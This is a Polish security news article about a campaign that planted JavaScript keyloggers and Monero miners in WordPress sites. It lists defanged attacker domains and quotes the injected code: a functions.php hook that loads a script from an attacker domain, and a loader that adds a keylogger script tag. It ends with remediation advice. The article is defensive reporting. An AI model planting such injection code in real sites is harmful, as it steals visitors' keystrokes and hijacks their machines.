Tysiące stron WordPress pobiera keyloggery JavaScript i kopie Monero

29 stycznia, 2018

Na razie mowa nawet o kilkuset stronach internetowych napędzanych WordPressem, które infekowane były złośliwym skryptem i ładowały z zewnętrznej domeny niebezpieczny JavaScript, który z kolei rejestrował wpisywane przez użytkownika dane w pola tekstowe na stronach internetowych. O kilkuset zainfekowanych witrynach wspominają eksperci z Sucuri. Niestety ów wektor dystrybucji złośliwego kodu był już zauważony w kwietniu 2017. Od tego czasu z kilkoma zmianami w domenach TLD (z nich zainfekowana strona ładowała kod JavaScript) i różnymi metodami zaciemniania kodu zdołano zainfekować kilka tysięcy instancji WordPressów, które kopały krypto-walutę Monero oraz służyły za „przeglądarkowego” keyloggera.

Domeny z których pobierano złośliwe biblioteki JavaScript:

hxxps://cdjs[.]online/lib.js
hxxps://cdjs[.]online/lib.js?ver=…
hxxps://cdns[.]ws/lib/googleanalytics.js?ver=…
hxxps://msdns[.]online/lib/mnngldr.js?ver=…
hxxps://msdns[.]online/lib/klldr.js //“keylogger loader”
hxxps://msdns[.]online/lib/kl.js //“keylogger loader”

Skrypty keyloggerów lub koparek Monero z domeny np. cdjs[.]online mogą być wstrzykiwane do bazy danych do tabeli „wp_posts” lub do pliku „functions.php”. Dzieje się tak na skutek dziurawej instancji WordPressa — luki we wtyczkach, samym rdzeniu WP, niewłaściwie zabezpieczonego serwera Apache, Nginx, czy też usługi SSH/FTP.

function chmnr_klgr_enqueue_script() {
wp_enqueue_script( 'chmnr_klgr-js', 'hxxps://cdns[.]ws/lib/googleanalytics.js', false );

wp

Domena „Cloudflare[.]solutions” została zablokowana przez dostawców wyszukiwarek (Google i Firefox, który korzysta z API Google do wykrywania złośliwych stron) i usunięta kilka dni po tym, jak badacze w grudniu 2017 roku opublikowali swoje odkrycie. Nie trzeba było długo czekać, aby przestępcy szybko zarejestrowali kilka nowych domen, które pobierały złośliwe biblioteki i które z kolei uruchamiały kod ładujący keyloggera lub koparkę Monero opracowaną przez firmę CoinHive, specjalizująca się w dostarczaniu takich usług internetowych:  

var snf = document.createElement("script");
snf.type = "text/javascript";
snf.setAttribute("defer", "defer");
snf.src = "hxxps://msdns[.]online/lib/kl.js";
document.head.appendChild(snf);

Administratorom blogów mniejszych i większych zalecamy, aby przyjrzeli się swoim stronom internetowym pod kątem złośliwych skryptów. Najlepiej zrobić to za pomocą wbudowanych w przeglądarki narzędzi deweloperskich lub posłużyć się poradnikiem rekomendowanym przez Sucuri lub przez polską firmę Webanti, która dostarcza gotowe narzędzia do ochrony w czasie rzeczywistym / skanowania stron internetowych.

Do infekcji dochodzi na skutek luk w oprogramowaniu, dlatego warto już teraz przeprowadzić aktualizację rdzenia, modułów, przejrzeć plik „functions.php” oraz pozmieniać wszystkie dostępowe hasła do panelu administratora, a także usług na serwerze.

Czy ten artykuł był pomocny?

Oceniono: 0 razy

Picture of Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.
Picture of Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.

PODZIEL SIĘ:

guest
0 komentarzy
najstarszy
najnowszy oceniany
Inline Feedbacks
View all comments

Zapisz się na newsletter

Informacje o cyberbezpieczeństwie prosto na skrzynkę pocztową!

Dodatkowo otrzymasz poradnik „Jak bezpiecznie funkcjonować w cyfrowym świecie”

[ninja_tables id=”27481″]

\r\n <\/div>\r\n<\/div>\r\n","isUserRated":"0","version":"7.6.29","wc_post_id":"18693","isCookiesEnabled":"1","loadLastCommentId":"0","dataFilterCallbacks":[],"phraseFilters":[],"scrollSize":"32","is_email_field_required":"1","url":"https:\/\/avlab.pl\/wp-admin\/admin-ajax.php","customAjaxUrl":"https:\/\/avlab.pl\/wp-content\/plugins\/wpdiscuz\/utils\/ajax\/wpdiscuz-ajax.php","bubbleUpdateUrl":"https:\/\/avlab.pl\/wp-json\/wpdiscuz\/v1\/update","restNonce":"a54e165c39","is_rate_editable":"0","menu_icon":"https:\/\/avlab.pl\/wp-content\/plugins\/wpdiscuz\/assets\/img\/plugin-icon\/wpdiscuz-svg.svg","menu_icon_hover":"https:\/\/avlab.pl\/wp-content\/plugins\/wpdiscuz\/assets\/img\/plugin-icon\/wpdiscuz-svg_hover.svg"}; var wpdiscuzUCObj = {"msgConfirmDeleteComment":"Are you sure you want to delete this comment?","msgConfirmCancelSubscription":"Are you sure you want to cancel this subscription?","msgConfirmCancelFollow":"Are you sure you want to cancel this follow?","additionalTab":"0"}; -->